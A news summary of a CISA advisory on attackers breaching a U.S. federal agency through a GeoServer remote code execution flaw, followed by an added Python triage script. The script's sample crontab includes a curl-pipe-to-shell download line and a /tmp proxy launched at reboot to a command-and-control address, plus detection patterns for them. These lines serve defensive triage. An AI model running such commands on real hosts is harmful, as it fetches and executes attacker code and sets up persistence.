CISA Details That Hackers Gained Access to a U.S. Federal Agency Network Via GeoServer RCE Vulnerability

CISA has released a comprehensive cybersecurity advisory detailing how threat actors successfully compromised a U.S. federal civilian executive branch agency’s network by exploiting CVE-2024-36401, a critical remote code execution vulnerability in GeoServer.

The attack commenced on July 11, 2024, when cyber threat actors exploited CVE-2024-36401 on a public-facing GeoServer instance to gain initial network access. This critical vulnerability, disclosed on June 30, 2024, enables unauthenticated users to achieve remote code execution through “eval injection” attacks on affected GeoServer versions.

Following initial access, the threat actors established persistence through multiple techniques, including deployment of China Chopper web shells, creation of cron jobs for scheduled command execution, and attempts to escalate privileges using the publicly available Dirty COW exploit targeting CVE-2016-5195.

The attackers also staged the RingQ defense evasion tool and utilized the Stowaway multi-level proxy tool to establish command and control communications over TCP ports 4441 and 50012.
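As an added triage example (not part of the advisory or the article), the script below checks two of the host-level indicators described above: cron entries of the download-and-execute or run-from-temp-directory kind, and established connections to the reported C2 ports 4441 and 50012. The crontab and `ss -tnp` samples, the process name `stow` and the IP addresses are all constructed for illustration.

```python
# Triage helper for the persistence and C2 indicators named in the CISA
# advisory: cron-based persistence and Stowaway C2 over TCP 4441/50012.
import re

# C2 ports reported in the advisory (Stowaway proxy traffic).
C2_PORTS = {4441, 50012}

# Constructed sample of `crontab -l` output from a GeoServer host.
SAMPLE_CRONTAB = """\
# m h dom mon dow command
0 2 * * * /opt/geoserver/bin/backup.sh
*/5 * * * * curl -s http://203.0.113.10/x.sh | sh
@reboot /tmp/.X11/stow -c 203.0.113.10:4441
"""

# Constructed sample of `ss -tnp` output: State Recv-Q Send-Q Local Peer Process.
SAMPLE_CONNECTIONS = """\
ESTAB 0 0 10.0.0.5:46212 203.0.113.10:4441 users:(("stow",pid=2211,fd=3))
ESTAB 0 0 10.0.0.5:8080 10.0.0.9:51234 users:(("java",pid=1402,fd=77))
ESTAB 0 0 10.0.0.5:39004 198.51.100.7:50012 users:(("stow",pid=2211,fd=5))
"""

# Download-and-pipe-to-shell, or commands living in world-writable temp dirs.
SUSPICIOUS_CRON = re.compile(r"(curl|wget)\b.*\|\s*(ba)?sh|/tmp/|/dev/shm/")


def suspicious_cron_entries(crontab_text):
    """Return non-comment cron lines matching the persistence patterns."""
    hits = []
    for line in crontab_text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        if SUSPICIOUS_CRON.search(line):
            hits.append(line)
    return hits


def c2_connections(ss_text, ports=C2_PORTS):
    """Return (peer_ip, port, 'proc[pid]') for connections to the C2 ports."""
    found = []
    for line in ss_text.splitlines():
        fields = line.split()
        if len(fields) < 5:
            continue
        ip, _, port = fields[4].rpartition(":")  # peer address is column 5
        if port.isdigit() and int(port) in ports:
            m = re.search(r'\(\("([^"]+)",pid=(\d+)', line)
            proc = f"{m.group(1)}[{m.group(2)}]" if m else "?"
            found.append((ip, int(port), proc))
    return found
```

Run the two functions against real `crontab -l` (per user) and `ss -tnp` output; a hit on either is a starting point for the web-shell and privilege-escalation checks the advisory also describes, not a verdict on its own.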

To read the complete article, see: Cyber Security News

This post is licensed under CC BY 4.0 by the author.